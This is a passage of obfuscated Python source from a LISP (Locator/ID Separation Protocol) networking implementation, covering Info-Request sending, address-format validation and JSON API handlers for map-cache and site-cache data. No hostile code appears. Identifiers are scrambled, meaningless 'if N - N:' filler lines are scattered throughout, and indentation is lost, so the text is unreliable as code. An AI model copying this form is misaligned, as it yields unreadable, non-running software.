if 82 - 82: iII111i - I1Ii111 - OoOoOO00
if 96 - 96: Oo0Ooo . Oo0Ooo % o0oOOo0O0Ooo - I1IiiI * iIii1I11I1II1
if 29 - 29: i1IIi / Ii1I / oO0o * iII111i
i1iI1I1I1iI1 = [ ]
oOo0o0o = [ ]
if ( dest == None ) :
for O0o00000o0O in lisp_map_resolvers_list . values ( ) :
oOo0o0o . append ( O0o00000o0O . map_resolver )
if 39 - 39: IiII / iIii1I11I1II1 * iII111i - OoOoOO00 . I1ii11iIi11i
i1iI1I1I1iI1 = oOo0o0o
if ( i1iI1I1I1iI1 == [ ] ) :
for o00oO0Oo in lisp_map_servers_list . values ( ) :
i1iI1I1I1iI1 . append ( o00oO0Oo . map_server )
if 49 - 49: Ii1I . o0oOOo0O0Ooo / iII111i / i1IIi * OOooOOo
if 10 - 10: ooOoO0o . I1ii11iIi11i / oO0o
if ( i1iI1I1I1iI1 == [ ] ) : return
else :
i1iI1I1I1iI1 . append ( dest )
if 61 - 61: OoO0O00 . Ii1I * o0oOOo0O0Ooo
if 2 - 2: OoOoOO00 / O0
if 87 - 87: I1ii11iIi11i * i1IIi + oO0o % OoO0O00 % iII111i . I11i
if 65 - 65: II111iiii + Ii1I
if 46 - 46: o0oOOo0O0Ooo
II1IIii = { }
for Ooooo00 in lisp_db_list :
for iIII in Ooooo00 . rloc_set :
lisp_update_local_rloc ( iIII )
if ( iIII . rloc . is_null ( ) ) : continue
if ( iIII . interface == None ) : continue
if 17 - 17: OOooOOo
IiiIIi1 = iIII . rloc . print_address_no_iid ( )
if ( IiiIIi1 in II1IIii ) : continue
II1IIii [ IiiIIi1 ] = iIII . interface
if 75 - 75: Ii1I / i1IIi % I1ii11iIi11i . Ii1I
if 46 - 46: II111iiii * OoO0O00
if ( II1IIii == { } ) :
lprint ( 'Suppress Info-Request, no "interface = <device>" RLOC ' + "found in any database-mappings" )
if 77 - 77: ooOoO0o * I11i
return
if 85 - 85: OoO0O00 * I1Ii111 - OoooooooOO / iIii1I11I1II1 - i1IIi + Ii1I
if 76 - 76: iII111i * OoooooooOO
if 49 - 49: II111iiii - OOooOOo + II111iiii + OoOoOO00
if 51 - 51: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo % I1Ii111 % i1IIi - II111iiii + i11iIiiIii
if 62 - 62: I1ii11iIi11i - I1IiiI * i11iIiiIii % oO0o
for IiiIIi1 in II1IIii :
II1i = II1IIii [ IiiIIi1 ]
OO0o = red ( IiiIIi1 , False )
lprint ( "Build Info-Request for private address {} ({})" . format ( OO0o ,
II1i ) )
OoO0o0OOOO = II1i if len ( II1IIii ) > 1 else None
for dest in i1iI1I1I1iI1 :
lisp_send_info_request ( lisp_sockets , dest , port , OoO0o0OOOO )
if 63 - 63: II111iiii - Oo0Ooo
if 55 - 55: iIii1I11I1II1 / O0 * O0 * i11iIiiIii * OoooooooOO
if 94 - 94: II111iiii . II111iiii / OoOoOO00 % oO0o * i1IIi % Oo0Ooo
if 78 - 78: IiII - I1IiiI
if 59 - 59: oO0o + i1IIi - IiII % OOooOOo % iIii1I11I1II1
if 71 - 71: OoO0O00
if ( oOo0o0o != [ ] ) :
for O0o00000o0O in lisp_map_resolvers_list . values ( ) :
O0o00000o0O . resolve_dns_name ( )
if 72 - 72: II111iiii + o0oOOo0O0Ooo / i1IIi * Oo0Ooo / i1IIi
if 52 - 52: I1Ii111 % OoO0O00 . I1Ii111 * I1ii11iIi11i * OoOoOO00 + i1IIi
return
if 54 - 54: Ii1I / I1IiiI
if 7 - 7: iIii1I11I1II1 . O0 + OOooOOo . Ii1I * Oo0Ooo
if 25 - 25: I1Ii111 . Oo0Ooo % II111iiii . IiII - O0
if 18 - 18: oO0o * OOooOOo
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i - I1ii11iIi11i / iIii1I11I1II1
if 42 - 42: iIii1I11I1II1 / OOooOOo - O0 * OoooooooOO / i1IIi
if 33 - 33: OOooOOo . o0oOOo0O0Ooo % OoO0O00 - I1Ii111 . OoooooooOO
if 96 - 96: II111iiii % I11i / Ii1I - i11iIiiIii
def lisp_valid_address_format ( kw , value ) :
if ( kw != "address" ) : return ( True )
if 63 - 63: I1IiiI
if 15 - 15: iIii1I11I1II1 - I1ii11iIi11i % OoO0O00 * II111iiii / I11i + I11i
if 23 - 23: I1IiiI
if 51 - 51: i11iIiiIii / ooOoO0o - OoooooooOO + OoOoOO00 + oO0o
if 57 - 57: iIii1I11I1II1
if ( value [ 0 ] == "'" and value [ - 1 ] == "'" ) : return ( True )
if 19 - 19: Ii1I / o0oOOo0O0Ooo + O0 / iIii1I11I1II1 + II111iiii
if 3 - 3: oO0o % OoO0O00 % OOooOOo
if 64 - 64: o0oOOo0O0Ooo . II111iiii * IiII % Oo0Ooo + I11i - OoooooooOO
if 58 - 58: ooOoO0o
if ( value . find ( "." ) != - 1 ) :
IiiIIi1 = value . split ( "." )
if ( len ( IiiIIi1 ) != 4 ) : return ( False )
if 15 - 15: O0 * OOooOOo * I11i + Ii1I * OoooooooOO + OOooOOo
for o0O00Ooo00oOO in IiiIIi1 :
if ( o0O00Ooo00oOO . isdigit ( ) == False ) : return ( False )
if ( int ( o0O00Ooo00oOO ) > 255 ) : return ( False )
if 60 - 60: i11iIiiIii * O0 + I1ii11iIi11i % IiII + iIii1I11I1II1
return ( True )
if 82 - 82: OoO0O00 . I1IiiI + o0oOOo0O0Ooo
if 52 - 52: oO0o . OOooOOo + iII111i * ooOoO0o + IiII / I1Ii111
if 88 - 88: OoO0O00 * I1ii11iIi11i - I1IiiI * IiII * Oo0Ooo % OoooooooOO
if 15 - 15: OOooOOo - I1Ii111 - OOooOOo
if 73 - 73: iII111i + o0oOOo0O0Ooo % iII111i . Ii1I + OoO0O00 - I1ii11iIi11i
if ( value . find ( "-" ) != - 1 ) :
IiiIIi1 = value . split ( "-" )
for IiIIi1IiiIiI in [ "N" , "S" , "W" , "E" ] :
if ( IiIIi1IiiIiI in IiiIIi1 ) :
if ( len ( IiiIIi1 ) < 8 ) : return ( False )
return ( True )
if 47 - 47: OoO0O00 * O0 % iIii1I11I1II1
if 92 - 92: IiII
if 68 - 68: OOooOOo . IiII / iIii1I11I1II1 % i11iIiiIii
if 74 - 74: iII111i + i11iIiiIii
if 95 - 95: Ii1I
if 49 - 49: I1ii11iIi11i . i1IIi + OoO0O00 % O0 + OoO0O00
if 21 - 21: ooOoO0o * oO0o / OoooooooOO % ooOoO0o / O0
if ( value . find ( "-" ) != - 1 ) :
IiiIIi1 = value . split ( "-" )
if ( len ( IiiIIi1 ) != 3 ) : return ( False )
if 24 - 24: OoO0O00 - i11iIiiIii / i11iIiiIii * I1Ii111
for I1iiI1Iii1I in IiiIIi1 :
try : int ( I1iiI1Iii1I , 16 )
except : return ( False )
if 57 - 57: IiII % OoooooooOO . II111iiii % o0oOOo0O0Ooo
return ( True )
if 7 - 7: OoooooooOO / Oo0Ooo / oO0o
if 44 - 44: I1ii11iIi11i % o0oOOo0O0Ooo / iIii1I11I1II1 - o0oOOo0O0Ooo / I11i * I1Ii111
if 49 - 49: iII111i / iII111i - OoOoOO00
if 89 - 89: ooOoO0o
if 16 - 16: oO0o + oO0o + i1IIi + iIii1I11I1II1
if ( value . find ( ":" ) != - 1 ) :
IiiIIi1 = value . split ( ":" )
if ( len ( IiiIIi1 ) < 2 ) : return ( False )
if 93 - 93: I1IiiI - i11iIiiIii * I1Ii111 - O0 + iII111i
i1Iiii1I1i1 = False
OO = 0
for I1iiI1Iii1I in IiiIIi1 :
OO += 1
if ( I1iiI1Iii1I == "" ) :
if ( i1Iiii1I1i1 ) :
if ( len ( IiiIIi1 ) == OO ) : break
if ( OO > 2 ) : return ( False )
if 71 - 71: OoooooooOO + oO0o
i1Iiii1I1i1 = True
continue
if 65 - 65: II111iiii
try : int ( I1iiI1Iii1I , 16 )
except : return ( False )
if 87 - 87: oO0o / OoO0O00 - oO0o
return ( True )
if 69 - 69: i11iIiiIii
if 29 - 29: IiII . ooOoO0o / iII111i - OOooOOo / OOooOOo % Oo0Ooo
if 42 - 42: OoO0O00 . I1Ii111 . I1IiiI + Oo0Ooo * O0
if 35 - 35: Oo0Ooo / iII111i - O0 - OOooOOo * Oo0Ooo . i11iIiiIii
if 43 - 43: OoOoOO00 % oO0o % OoO0O00 / Ii1I . I11i
if ( value [ 0 ] == "+" ) :
IiiIIi1 = value [ 1 : : ]
for O0OoO0Oo0oO0o in IiiIIi1 :
if ( O0OoO0Oo0oO0o . isdigit ( ) == False ) : return ( False )
if 68 - 68: o0oOOo0O0Ooo + IiII / iII111i - i11iIiiIii / OOooOOo
return ( True )
if 62 - 62: I1IiiI
return ( False )
if 42 - 42: II111iiii
if 49 - 49: OoooooooOO
if 48 - 48: i1IIi . IiII - O0 + OoooooooOO
if 6 - 6: I1Ii111 * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i * I1Ii111
if 6 - 6: oO0o / II111iiii
if 23 - 23: IiII - OoooooooOO / oO0o
if 69 - 69: O0 - OoooooooOO
if 31 - 31: o0oOOo0O0Ooo . i1IIi - i1IIi % i1IIi - iIii1I11I1II1
if 50 - 50: IiII - OOooOOo % OoOoOO00
if 66 - 66: IiII * i11iIiiIii
if 64 - 64: i11iIiiIii . I1Ii111 % i11iIiiIii % I11i
if 56 - 56: o0oOOo0O0Ooo + ooOoO0o + OoooooooOO
def lisp_process_api ( process , lisp_socket , data_structure ) :
o0Oo , I1I1i = data_structure . split ( "%" )
if 46 - 46: o0oOOo0O0Ooo % i11iIiiIii * ooOoO0o / i1IIi * i1IIi
lprint ( "Process API request '{}', parameters: '{}'" . format ( o0Oo ,
I1I1i ) )
if 71 - 71: I1IiiI + i1IIi
oo00000ooOooO = [ ]
if ( o0Oo == "map-cache" ) :
if ( I1I1i == "" ) :
oo00000ooOooO = lisp_map_cache . walk_cache ( lisp_process_api_map_cache , oo00000ooOooO )
else :
oo00000ooOooO = lisp_process_api_map_cache_entry ( json . loads ( I1I1i ) )
if 96 - 96: I1Ii111 . Oo0Ooo % I11i % I1ii11iIi11i % II111iiii * IiII
if 69 - 69: OoO0O00 * Oo0Ooo * iII111i
if ( o0Oo == "site-cache" ) :
if ( I1I1i == "" ) :
oo00000ooOooO = lisp_sites_by_eid . walk_cache ( lisp_process_api_site_cache ,
oo00000ooOooO )
else :
oo00000ooOooO = lisp_process_api_site_cache_entry ( json . loads ( I1I1i ) )
if 2 - 2: iII111i - Ii1I
if 1 - 1: I1Ii111 / oO0o + iIii1I11I1II1
if ( o0Oo == "map-server" ) :
I1I1i = { } if ( I1I1i == "" ) else json . loads ( I1I1i )
oo00000ooOooO = lisp_process_api_ms_or_mr ( True , I1I1i )
if 88 - 88: o0oOOo0O0Ooo
if ( o0Oo == "map-resolver" ) :
I1I1i = { } if ( I1I1i == "" ) else json . loads ( I1I1i )
oo00000ooOooO = lisp_process_api_ms_or_mr ( False , I1I1i )
if 3 - 3: i11iIiiIii / I1ii11iIi11i
if ( o0Oo == "database-mapping" ) :
oo00000ooOooO = lisp_process_api_database_mapping ( )
if 49 - 49: IiII
if 1 - 1: oO0o / I11i
if 99 - 99: OoO0O00 % IiII + I1Ii111 - oO0o
if 28 - 28: OOooOOo - O0 - O0 % i11iIiiIii * OoooooooOO
if 60 - 60: OoooooooOO / i1IIi / i1IIi / Ii1I . IiII
oo00000ooOooO = json . dumps ( oo00000ooOooO )
OoOO0o00OOO0o = lisp_api_ipc ( process , oo00000ooOooO )
lisp_ipc ( OoOO0o00OOO0o , lisp_socket , "lisp-core" )
return
if 24 - 24: O0
if 6 - 6: I1IiiI . i11iIiiIii . OoooooooOO . I1IiiI . o0oOOo0O0Ooo
if 65 - 65: i11iIiiIii
if 46 - 46: i11iIiiIii
if 70 - 70: i1IIi + o0oOOo0O0Ooo
if 44 - 44: iII111i . II111iiii % o0oOOo0O0Ooo
if 29 - 29: i11iIiiIii * i1IIi
def lisp_process_api_map_cache ( mc , data ) :
if 36 - 36: OoO0O00 * I11i . ooOoO0o
if 50 - 50: oO0o * OoOoOO00 / OoO0O00 / ooOoO0o + II111iiii
if 55 - 55: II111iiii - IiII
if 24 - 24: oO0o % Ii1I / i1IIi
if ( mc . group . is_null ( ) ) : return ( lisp_gather_map_cache_data ( mc , data ) )
if 84 - 84: i1IIi
if ( mc . source_cache == None ) : return ( [ True , data ] )
if 53 - 53: OoooooooOO - i1IIi - Ii1I
if 73 - 73: I1ii11iIi11i - Ii1I * o0oOOo0O0Ooo
if 29 - 29: o0oOOo0O0Ooo % IiII % OOooOOo + OoooooooOO - o0oOOo0O0Ooo
if 34 - 34: Ii1I
if 5 - 5: II111iiii . I1ii11iIi11i
data = mc . source_cache . walk_cache ( lisp_gather_map_cache_data , data )
return ( [ True , data ] )
if 85 - 85: I1Ii111 . IiII + II111iiii
if 92 - 92: iII111i / o0oOOo0O0Ooo * oO0o . I11i % o0oOOo0O0Ooo
if 87 - 87: Ii1I / Oo0Ooo % iIii1I11I1II1 / iII111i
if 42 - 42: OoO0O00 . I1IiiI . OOooOOo + ooOoO0o
if 87 - 87: OOooOOo
if 44 - 44: Oo0Ooo + iIii1I11I1II1
if 67 - 67: iII111i . OOooOOo / ooOoO0o * iIii1I11I1II1
def lisp_gather_map_cache_data ( mc , data ) :
I1iII11ii1 = { }
I1iII11ii1 [ "instance-id" ] = str ( mc . eid . instance_id )
I1iII11ii1 [ "eid-prefix" ] = mc . eid . print_prefix_no_iid ( )
if ( mc . group . is_null ( ) == False ) :
I1iII11ii1 [ "group-prefix" ] = mc . group . print_prefix_no_iid ( )
if 29 - 29: I1Ii111 / OoOoOO00 % I1ii11iIi11i * IiII / II111iiii
I1iII11ii1 [ "uptime" ] = lisp_print_elapsed ( mc . uptime )
I1iII11ii1 [ "expires" ] = lisp_print_elapsed ( mc . uptime )
I1iII11ii1 [ "action" ] = lisp_map_reply_action_string [ mc . action ]
I1iII11ii1 [ "ttl" ] = "--" if mc . map_cache_ttl == None else str ( mc . map_cache_ttl / 60 )
if 10 - 10: O0 / I11i
if 29 - 29: i11iIiiIii % I11i
if 49 - 49: I11i
if 69 - 69: o0oOOo0O0Ooo . O0 * I11i
if 92 - 92: OoO0O00 . O0 / Ii1I % Oo0Ooo . Ii1I
ooo0oo = [ ]
for oOo00O in mc . rloc_set :
i11iII1IiI = { }
if ( oOo00O . rloc_exists ( ) ) :
i11iII1IiI [ "address" ] = oOo00O . rloc . print_address_no_iid ( )
if 40 - 40: o0oOOo0O0Ooo - Ii1I . iII111i - O0
if 53 - 53: Oo0Ooo - I1IiiI * O0 . II111iiii
if ( oOo00O . translated_port != 0 ) :
i11iII1IiI [ "encap-port" ] = str ( oOo00O . translated_port )
if 72 - 72: ooOoO0o - Ii1I . Ii1I . I11i / OoooooooOO + Ii1I
i11iII1IiI [ "state" ] = oOo00O . print_state ( )
if ( oOo00O . geo ) : i11iII1IiI [ "geo" ] = oOo00O . geo . print_geo ( )
if ( oOo00O . elp ) : i11iII1IiI [ "elp" ] = oOo00O . elp . print_elp ( False )
if ( oOo00O . rle ) : i11iII1IiI [ "rle" ] = oOo00O . rle . print_rle ( False , False )
if ( oOo00O . json ) : i11iII1IiI [ "json" ] = oOo00O . json . print_json ( False )
if ( oOo00O . rloc_name ) : i11iII1IiI [ "rloc-name" ] = oOo00O . rloc_name
i1I1IiiIi = oOo00O . stats . get_stats ( False , False )
if ( i1I1IiiIi ) : i11iII1IiI [ "stats" ] = i1I1IiiIi
i11iII1IiI [ "uptime" ] = lisp_print_elapsed ( oOo00O . uptime )
i11iII1IiI [ "upriority" ] = str ( oOo00O . priority )
i11iII1IiI [ "uweight" ] = str ( oOo00O . weight )
i11iII1IiI [ "mpriority" ] = str ( oOo00O . mpriority )
i11iII1IiI [ "mweight" ] = str ( oOo00O . mweight )
iII1IIiI1IiI1III = oOo00O . last_rloc_probe_reply
if ( iII1IIiI1IiI1III ) :
i11iII1IiI [ "last-rloc-probe-reply" ] = lisp_print_elapsed ( iII1IIiI1IiI1III )
i11iII1IiI [ "rloc-probe-rtt" ] = str ( oOo00O . rloc_probe_rtt )
if 45 - 45: iII111i
i11iII1IiI [ "rloc-hop-count" ] = oOo00O . rloc_probe_hops
i11iII1IiI [ "recent-rloc-hop-counts" ] = oOo00O . recent_rloc_probe_hops
if 9 - 9: OOooOOo * o0oOOo0O0Ooo / I11i . i11iIiiIii
i1iI11Ii1 = [ ]
for i1i1I1I1 in oOo00O . recent_rloc_probe_rtts : i1iI11Ii1 . append ( str ( i1i1I1I1 ) )
i11iII1IiI [ "recent-rloc-probe-rtts" ] = i1iI11Ii1
if 75 - 75: OoO0O00
ooo0oo . append ( i11iII1IiI )
if 34 - 34: Oo0Ooo - OOooOOo . OOooOOo . oO0o
I1iII11ii1 [ "rloc-set" ] = ooo0oo
if 18 - 18: iII111i . I1IiiI . ooOoO0o * oO0o / OoooooooOO
data . append ( I1iII11ii1 )
return ( [ True , data ] )
if 85 - 85: i1IIi
if 79 - 79: I11i - I11i
if 25 - 25: OOooOOo / O0 / iIii1I11I1II1 + II111iiii * Ii1I
if 74 - 74: i1IIi . I1Ii111 / O0 + Oo0Ooo * OOooOOo
if 90 - 90: I1IiiI * II111iiii . Oo0Ooo % I1IiiI
if 100 - 100: iIii1I11I1II1 - OoooooooOO * OoooooooOO - iII111i / ooOoO0o
if 98 - 98: OoO0O00 + oO0o - II111iiii
def lisp_process_api_map_cache_entry ( parms ) :
o0OoO0000o = parms [ "instance-id" ]
o0OoO0000o = 0 if ( o0OoO0000o == "" ) else int ( o0OoO0000o )
if 84 - 84: Oo0Ooo . OoOoOO00 - iII111i
if 5 - 5: OoooooooOO . O0 / OOooOOo + I11i - Ii1I
if 77 - 77: iIii1I11I1II1 * Oo0Ooo . IiII / oO0o + O0
if 76 - 76: iII111i + o0oOOo0O0Ooo - OoooooooOO * oO0o % OoooooooOO - O0
OOo0O0O0o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
OOo0O0O0o0 . store_prefix ( parms [ "eid-prefix" ] )
oO0o0 = OOo0O0O0o0
oo00Oo0 = OOo0O0O0o0
if 18 - 18: Ii1I
if 82 - 82: OoOoOO00 + OoO0O00 - IiII / ooOoO0o
if 70 - 70: OoO0O00
if 43 - 43: ooOoO0o + OOooOOo + II111iiii - I1IiiI
if 58 - 58: I11i
O0o00oOOOO00 = lisp_address ( LISP_AFI_NONE , "" , 0 , o0OoO0000o )
if ( parms . has_key ( "group-prefix" ) ) :
O0o00oOOOO00 . store_prefix ( parms [ "group-prefix" ] )
oO0o0 = O0o00oOOOO00
if 94 - 94: Oo0Ooo
if 39 - 39: I11i - oO0o % iII111i - ooOoO0o - OoOoOO00
oo00000ooOooO = [ ]
IiiiiII1i = lisp_map_cache_lookup ( oo00Oo0 , oO0o0 )
if ( IiiiiII1i ) : O00O00o0O0O , oo00000ooOooO = lisp_process_api_map_cache ( IiiiiII1i , oo00000ooOooO )
return ( oo00000ooOooO )
if 8 - 8: i1IIi % i1IIi % OoooooooOO % i1IIi . iIii1I11I1II1
if 70 - 70: O0 + II111iiii % IiII / I1Ii111 - IiII
if 58 - 58: II111iiii * oO0o - i1IIi . I11i
if 23 - 23: OoO0O00 - I1IiiI * i11iIiiIii
if 62 - 62: OoO0O00 . i11iIiiIii / i1IIi
if 3 - 3: OoO0O00 + O0 % Oo0Ooo * Oo0Ooo % i11iIiiIii
if 29 - 29: ooOoO0o / iII111i / OOooOOo - iIii1I11I1II1
def lisp_process_api_site_cache ( se , data ) :
if 31 - 31: i1IIi * Ii1I
if 94 - 94: oO0o / Ii1I % iIii1I11I1II1 + i1IIi / O0 - iII111i
if 77 - 77: o0oOOo0O0Ooo - IiII . i1IIi
if 70 - 70: i1IIi . I1Ii111 . iII111i - OoOoOO00 + II111iiii + OOooOOo
if ( se . group . is_null ( ) ) : return ( lisp_gather_site_cache_data ( se , data ) )
if 52 - 52: OOooOOo . OoOoOO00 - ooOoO0o % i1IIi
if ( se . source_cache == None ) : return ( [ True , data ] )
if 15 - 15: oO0o
if 6 - 6: oO0o . iIii1I11I1II1 - I1ii11iIi11i % IiII
if 58 - 58: iII111i * oO0o / iII111i - Oo0Ooo / I1Ii111 * oO0o
if 63 - 63: oO0o . IiII . o0oOOo0O0Ooo
if 16 - 16: iII111i . I11i - Oo0Ooo / I1IiiI + OoOoOO00
data = se . source_cache . walk_cache ( lisp_gather_site_cache_data , data )
return ( [ True , data ] )
if 14 - 14: iIii1I11I1II1 / i11iIiiIii - o0oOOo0O0Ooo . iII111i * OoO0O00
if 5 - 5: Ii1I + OoOoOO00 % I11i + IiII
if 55 - 55: OoooooooOO + oO0o . o0oOOo0O0Ooo % iIii1I11I1II1 - I1Ii111
if 40 - 40: I1IiiI . o0oOOo0O0Ooo - Oo0Ooo
if 44 - 44: Ii1I % OoO0O00 * oO0o * OoO0O00
if 7 - 7: I1Ii111 % i1IIi . I11i . O0 / i1IIi
if 56 - 56: Oo0Ooo
def lisp_process_api_ms_or_mr ( ms_or_mr , data ) :
ii1i1II11II1i = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
OOIIi1Iii1I = data [ "dns-name" ] if data . has_key ( "dns-name" ) else None
if ( data . has_key ( "address" ) ) :
ii1i1II11II1i . store_address ( data [ "address" ] )
if 21 - 21: i11iIiiIii * o0oOOo0O0Ooo + Oo0Ooo
if 20 - 20: IiII / OoooooooOO / O0 / I1Ii111 * ooOoO0o
i11II = { }
if ( ms_or_mr ) :
for o00oO0Oo in lisp_map_servers_list . values ( ) :
if ( OOIIi1Iii1I ) :
if ( OOIIi1Iii1I != o00oO0Oo . dns_name ) : continue
else :
if ( ii1i1II11II1i . is_exact_match ( o00oO0Oo . map_server ) == False ) : continue
if 45 - 45: ooOoO0o / Oo0Ooo % o0oOOo0O0Ooo . ooOoO0o
if 19 - 19: o0oOOo0O0Ooo % I11i . I1ii11iIi11i
i11II [ "dns-name" ] = o00oO0Oo . dns_name
i11II [ "address" ] = o00oO0Oo . map_server . print_address_no_iid ( )
i11II [ "ms-name" ] = "" if o00oO0Oo . ms_name == None else o00oO0Oo . ms_name
return ( [ i11II ] )
if 70 - 70: Oo0Ooo - I11i / I1ii11iIi11i % OoO0O00 % II111iiii
else :
for O0o00000o0O in lisp_map_resolvers_list . values ( ) :
if ( OOIIi1Iii1I ) :
if ( OOIIi1Iii1I != O0o00000o0O . dns_name ) : continue
else :
if ( ii1i1II11II1i . is_exact_match ( O0o00000o0O . map_resolver ) == False ) : continue
if 72 - 72: i11iIiiIii * I11i
if 69 - 69: I1Ii111 . Ii1I * I1ii11iIi11i % I11i - o0oOOo0O0Ooo
i11II [ "dns-name" ] = O0o00000o0O . dns_name
i11II [ "address" ] = O0o00000o0O . map_resolver . print_address_no_iid ( )
i11II [ "mr-name" ] = "" if O0o00000o0O . mr_name == None else O0o00000o0O . mr_name
return ( [ i11II ] )
if 30 - 30: ooOoO0o / Oo0Ooo * iII111i % OoooooooOO / I1ii11iIi11i
if 64 - 64: OoooooooOO
return ( [ ] )
if 41 - 41: Ii1I . I11i / oO0o * OoooooooOO
if 98 - 98: I1ii11iIi11i - O0 + i11iIiiIii
if 71 - 71: O0 - OoooooooOO
if 82 - 82: i11iIiiIii * II111iiii % IiII
if 80 - 80: Ii1I . i11iIiiIii % oO0o * o0oOOo0O0Ooo
if 56 - 56: I1Ii111 % iII111i / II111iiii - Oo0Ooo - Oo0Ooo - iIii1I11I1II1
if 67 - 67: iII111i
if 80 - 80: Ii1I . iII111i * I1IiiI * Ii1I
def lisp_process_api_database_mapping ( ) :
oo00000ooOooO = [ ]
if 82 - 82: OoO0O00 % OoOoOO00 * i11iIiiIii . OoO0O00 . I1ii11iIi11i + Ii1I
for Ooooo00 in lisp_db_list :
I1iII11ii1 = { }
I1iII11ii1 [ "eid-prefix" ] = Ooooo00 . eid . print_prefix ( )
if ( Ooooo00 . group . is_null ( ) == False ) :
I1iII11ii1 [ "group-prefix" ] = Ooooo00 . group . print_prefix ( )
if 60 - 60: i1IIi / iII111i
if 10 - 10: I1Ii111 / OoOoOO00 * Ii1I % o0oOOo0O0Ooo . OoOoOO00 / I1ii11iIi11i
ooOOo = [ ]
for i11iII1IiI in Ooooo00 . rloc_set :
oOo00O = { }
if ( i11iII1IiI . rloc . is_null ( ) == False ) :
oOo00O [ "rloc" ] = i11iII1IiI . rloc . print_address_no_iid ( )
if 2 - 2: iIii1I11I1II1
if ( i11iII1IiI . rloc_name != None ) : oOo00O [ "rloc-name" ] = i11iII1IiI . rloc_name
if ( i11iII1IiI . interface != None ) : oOo00O [ "interface" ] = i11iII1IiI . interface
oo0OoOOo = i11iII1IiI . translated_rloc
if ( oo0OoOOo . is_null ( ) == False ) :
oOo00O [ "translated-rloc" ] = oo0OoOOo . print_address_no_iid ( )
if 47 - 47: i11iIiiIii * iII111i . OoOoOO00 * I1Ii111 % i11iIiiIii + Ii1I
if ( oOo00O != { } ) : ooOOo . append ( oOo00O )
if 65 - 65: Ii1I % i11iIiiIii
if 98 - 98: iII111i * o0oOOo0O0Ooo % Oo0Ooo
if 7 - 7: oO0o * OoooooooOO % o0oOOo0O0Ooo . I1Ii111 + O0
if 14 - 14: I11i * II111iiii % o0oOOo0O0Ooo / iII111i . OoooooooOO % iII111i
if 88 - 88: iII111i
I1iII11ii1 [ "rlocs" ] = ooOOo
if 94 - 94: OoooooooOO
if 32 - 32: I1ii11iIi11i
if 8 - 8: I11i * i11iIiiIii - ooOoO0o
if 47 - 47: ooOoO0o . I1IiiI / i11iIiiIii * iII111i * I1IiiI
oo00000ooOooO . append ( I1iII11ii1 )
if 8 - 8: oO0o % oO0o . iII111i / i1IIi % IiII
return ( oo00000ooOooO )
if 71 - 71: OoOoOO00 + oO0o % O0 + Oo0Ooo
if 62 - 62: i1IIi . Ii1I * i1IIi * O0 . I1IiiI % o0oOOo0O0Ooo
if 16 - 16: I11i . Ii1I - ooOoO0o . OOooOOo % O0 / oO0o
if 42 - 42: II111iiii . iII111i
if 67 - 67: i1IIi - i11iIiiIii / ooOoO0o * oO0o
if 64 - 64: oO0o / IiII
if 86 - 86: I11i
def lisp_gather_site_cache_data ( se , data ) :
I1iII11ii1 = { }
I1iII11ii1 [ "site-name" ] = se . site . site_name
I1iII11ii1 [ "instance-id" ] = str ( se . eid . instance_id )
I1iII11ii1 [ "eid-prefix" ] = se . eid . print_prefix_no_iid ( )
if ( se . group . is_null ( ) == False ) :
I1iII11ii1 [ "group-prefix" ] = se . group . print_prefix_no_iid ( )
if 36 - 36: o0oOOo0O0Ooo / OoO0O00
I1iII11ii1 [ "registered" ] = "yes" if se . registered else "no"
I1iII11ii1 [ "first-registered" ] = lisp_print_elapsed ( se . first_registered )
I1iII11ii1 [ "last-registered" ] = lisp_print_elapsed ( se . last_registered )
if 6 - 6: I11i % I1IiiI + iII111i * OoooooooOO . O0
IiiIIi1 = se . last_registerer
IiiIIi1 = "none" if IiiIIi1 . is_null ( ) else IiiIIi1 . print_address ( )
I1iII11ii1 [ "last-registerer" ] = IiiIIi1
I1iII11ii1 [ "ams" ] = "yes" if ( se . accept_more_specifics ) else "no"
I1iII11ii1 [ "dynamic" ] = "yes" if ( se . dynamic ) else "no"
I1iII11ii1 [ "site-id" ] = str ( se . site_id )
if ( se . xtr_id_present ) :
I1iII11ii1 [ "xtr-id" ] = "0x" + lisp_hex_string ( se . xtr_id )
if 87 - 87: ooOoO0o / Ii1I % O0 . OoO0O00
if 55 - 55: i1IIi . o0oOOo0O0Ooo % OoooooooOO + II111iiii . OoOoOO00
if 32 - 32: IiII * I1Ii111 * Oo0Ooo . i1IIi * OoooooooOO
if 12 - 12: I1IiiI . OOooOOo % Oo0Ooo
if 86 - 86: i11iIiiIii
ooo0oo = [ ]
for oOo00O in se . registered_rlocs :
i11iII1IiI = { }
i11iII1IiI [ "address" ] = oOo00O . rloc . print_address_no_iid ( ) if oOo00O . rloc_exists ( ) else "none"
if 57 - 57: iII111i - OoooooooOO - ooOoO0o % II111iiii
if 62 - 62: i11iIiiIii . Oo0Ooo / Oo0Ooo . IiII . OoooooooOO
if ( oOo00O . geo ) : i11iII1IiI [ "geo" ] = oOo00O . geo . print_geo ( )
if ( oOo00O . elp ) : i11iII1IiI [ "elp" ] = oOo00O . elp . print_elp ( False )
if ( oOo00O . rle ) : i11iII1IiI [ "rle" ] = oOo00O . rle . print_rle ( False , True )
if ( oOo00O . json ) : i11iII1IiI [ "json" ] = oOo00O . json . print_json ( False )
if ( oOo00O . rloc_name ) : i11iII1IiI [ "rloc-name" ] = oOo00O . rloc_name
i11iII1IiI [ "uptime" ] = lisp_print_elapsed ( oOo00O . uptime )
i11iII1IiI [ "upriority" ] = str ( oOo00O . priority )
i11iII1IiI [ "uweight" ] = str ( oOo00O . weight )
i11iII1IiI [ "mpriority" ] = str ( oOo00O . mpriority )
i11iII1IiI [ "mweight" ] = str ( oOo00O . mweight )
if 86 - 86: I1ii11iIi11i * OoOoOO00 + iII111i
ooo0oo . append ( i11iII1IiI )
if 79 - 79: I11i - II111iiii
I1iII11ii1 [ "registered-rlocs" ] = ooo0oo
if 27 - 27: I1IiiI + o0oOOo0O0Ooo * oO0o % I1IiiI
data . append ( I1iII11ii1 )
return ( [ True , data ] )
if 66 - 66: OoO0O00 + IiII . o0oOOo0O0Ooo . IiII
if 88 - 88: oO0o + oO0o % OoO0O00 . OoooooooOO - OoooooooOO . Oo0Ooo
if 44 - 44: I1IiiI * IiII . OoooooooOO
if 62 - 62: I11i - Ii1I / i11iIiiIii * I1IiiI + ooOoO0o + o0oOOo0O0Ooo
if 10 - 10: i1IIi + o0oOOo0O0Ooo
